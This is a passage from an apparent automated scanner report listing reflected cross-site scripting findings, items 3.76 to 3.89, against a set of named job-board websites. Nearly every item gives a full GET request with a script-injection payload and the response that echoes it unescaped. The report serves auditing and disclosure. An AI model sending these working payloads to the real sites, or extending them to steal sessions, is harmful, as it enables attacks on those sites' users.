Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:38 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112743

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.hvaccrossing.com/?c4ad5"><script>alert(1)</script>15b6379fa02=1">
...[SNIP]...

3.76. http://www.informationtechnologycrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.informationtechnologycrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abe89"><script>alert(1)</script>2552cabb35c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?abe89"><script>alert(1)</script>2552cabb35c=1 HTTP/1.1
Host: www.informationtechnologycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

3.77. http://www.insurcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.insurcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaf58"><script>alert(1)</script>b6fe24e8d54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?eaf58"><script>alert(1)</script>b6fe24e8d54=1 HTTP/1.1
Host: www.insurcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=d7obm82fb47njpvi2di4tqcjg4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:52 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:52 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:52 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:52 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:52 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:52 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 127269

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.insurcrossing.com/?eaf58"><script>alert(1)</script>b6fe24e8d54=1">
...[SNIP]...

3.78. http://www.intellectualpropertycrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.intellectualpropertycrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa1e0"><script>alert(1)</script>6b575e61947 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fa1e0"><script>alert(1)</script>6b575e61947=1 HTTP/1.1
Host: www.intellectualpropertycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7ebiu1eg1hbgqgof2fg6sqjau1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:53 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:53 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:53 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:53 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:53 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:53 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 118064

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.intellectualpropertycrossing.com/?fa1e0"><script>alert(1)</script>6b575e61947=1">
...[SNIP]...

3.79. http://www.internshipcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.internshipcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b43b"><script>alert(1)</script>cd4dbddd825 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4b43b"><script>alert(1)</script>cd4dbddd825=1 HTTP/1.1
Host: www.internshipcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:57 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=8s0f63cmgh30cj79o4c02g2hs6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:57 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 132185

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.internshipcrossing.com/?4b43b"><script>alert(1)</script>cd4dbddd825=1">
...[SNIP]...

3.80. http://www.j2eecrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.j2eecrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 901d9"><script>alert(1)</script>537a79e09a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?901d9"><script>alert(1)</script>537a79e09a3=1 HTTP/1.1
Host: www.j2eecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:02 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4fiue61e3a63g6up9j0v9od9g3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111709

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.j2eecrossing.com/?901d9"><script>alert(1)</script>537a79e09a3=1">
...[SNIP]...

3.81. http://www.journalismcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.journalismcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49fb4"><script>alert(1)</script>5e010705692 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?49fb4"><script>alert(1)</script>5e010705692=1 HTTP/1.1
Host: www.journalismcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:15 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=m2dmhs0p970tp09le2iib1k566; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:15 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:15 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:15 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:15 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:15 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:15 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:15 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:15 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111407

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.journalismcrossing.com/?49fb4"><script>alert(1)</script>5e010705692=1">
...[SNIP]...

3.82. http://www.lawcrossing.com/lcjssearchresults.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/lcjssearchresults.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cde91"><script>alert(1)</script>1010a52da99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lcjssearchresults.php/cde91"><script>alert(1)</script>1010a52da99 HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7et0cefrt5l6f61hpkgascchn0; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:33 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 92602

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
<form id="formmain" name="formmain" Method="POST" action="/lcjssearchresults.php/cde91"><script>alert(1)</script>1010a52da99" onSubmit="return gotopageno();">
...[SNIP]...

3.83. http://www.logisticscrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.logisticscrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c0f2"><script>alert(1)</script>581f158145d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2c0f2"><script>alert(1)</script>581f158145d=1 HTTP/1.1
Host: www.logisticscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:55 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qieacg3sf3ukten0tvgskqclr5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:55 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113405

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.logisticscrossing.com/?2c0f2"><script>alert(1)</script>581f158145d=1">
...[SNIP]...

3.84. http://www.managercrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.managercrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa799"><script>alert(1)</script>4bc6ed1bde1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fa799"><script>alert(1)</script>4bc6ed1bde1=1 HTTP/1.1
Host: www.managercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:18 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=94ctq8p6ivl3v99kap75ucf440; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:18 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:18 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:18 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:18 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:18 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:18 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 128649

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.managercrossing.com/?fa799"><script>alert(1)</script>4bc6ed1bde1=1">
...[SNIP]...

3.85. http://www.manufacturingcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.manufacturingcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c71b"><script>alert(1)</script>02fbec31cd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3c71b"><script>alert(1)</script>02fbec31cd7=1 HTTP/1.1
Host: www.manufacturingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2vlv8pl6j195dlj5ftspu2fa42; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:54 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:54 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:54 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:54 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:54 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:54 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121495

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.manufacturingcrossing.com/?3c71b"><script>alert(1)</script>02fbec31cd7=1">
...[SNIP]...

3.86. http://www.marketingcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.marketingcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2da59"><script>alert(1)</script>7f14b1855c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2da59"><script>alert(1)</script>7f14b1855c9=1 HTTP/1.1
Host: www.marketingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:45 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=3j1g01ot7jp0c1torvm4m80pj2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:45 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:45 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:45 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:45 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:45 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:45 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:45 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 131635

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.marketingcrossing.com/?2da59"><script>alert(1)</script>7f14b1855c9=1">
...[SNIP]...

3.87. http://www.mediajobcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mediajobcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 444a4"><script>alert(1)</script>f1c71a28164 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?444a4"><script>alert(1)</script>f1c71a28164=1 HTTP/1.1
Host: www.mediajobcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:30 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kmd4t8g4d1d4ki1cuj88l3bbe7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:30 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:30 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:30 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:30 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:30 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:30 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:30 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:30 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122756

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.mediajobcrossing.com/?444a4"><script>alert(1)</script>f1c71a28164=1">
...[SNIP]...

3.88. http://www.militarycrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.militarycrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0099"><script>alert(1)</script>0eefe3fc8f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f0099"><script>alert(1)</script>0eefe3fc8f1=1 HTTP/1.1
Host: www.militarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=07205f964obb17b1v9f3cfauq6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:38 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:38 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:38 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:38 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:38 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:38 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:38 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:38 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104794

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.militarycrossing.com/?f0099"><script>alert(1)</script>0eefe3fc8f1=1">
...[SNIP]...

3.89. http://www.nursingcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nursingcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e967"><script>alert(1)</script>7f175de2ffb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3e967"><script>alert(1)</script>7f175de2ffb=1 HTTP/1.1
Host: www.nursingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:05 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gj77rk9bta460ddthltprn68v7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:05 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:05 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:05 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:05 GMT
